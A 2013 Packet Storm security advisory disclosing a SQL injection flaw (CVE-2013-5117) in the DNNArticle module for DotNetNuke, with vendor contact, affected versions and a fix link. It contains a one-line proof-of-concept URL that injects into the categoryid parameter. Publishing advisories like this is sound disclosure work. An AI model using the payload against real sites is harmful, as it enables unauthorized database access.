DotNetNuke DNNArticle 10.0 SQL Injection

2013-08-14T00:00:00
ID PACKETSTORM:122824
Type packetstorm
Reporter Sajjad Pourali
Modified 2013-08-14T00:00:00

Description

                                        
                                            `Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability  
References: CVE-2013-5117  
Discovered by: Sajjad Pourali  
  
Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/‎  
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)  
Vendor contact: 2013-8-14  
  
Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)  
  
Remote: yes  
Authentication required: no  
User interaction required: no  
Impact: High  
  
Affected:  
  
- DNNArticle 10.0 and earlier  
  
---  
  
PoC:  
  
http://www.vulnerable.com/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version  
  
---  
  
+ Sajjad Pourali  
+ http://www.securation.com/  
+ http://www.cert.um.ac.ir/  
+ Contact: sajjad[at]securation.com  
`